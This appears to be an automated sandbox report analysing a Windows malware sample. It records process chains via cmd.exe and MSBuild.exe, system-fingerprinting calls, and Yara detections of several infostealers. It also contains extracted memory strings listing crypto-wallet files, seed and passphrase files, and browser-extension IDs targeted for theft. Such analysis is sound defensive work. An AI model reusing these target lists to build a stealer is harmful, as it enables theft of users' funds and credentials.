Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"

Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_05D104F8
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_05D1045D
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_05D10412
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,	0_2_05D107D3
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,	0_2_05D107D5
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,	0_2_05D0774B
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_05D1019A
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_05D108FE
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: EnumSystemLocalesW,	0_2_05D07358
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_05D10AD2
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: GetLocaleInfoW,	0_2_05D10A05
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u3bs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe

Code function: 5_2_000F2DA6 _memset,GetVersionExW,

5_2_000F2DA6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 6164, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
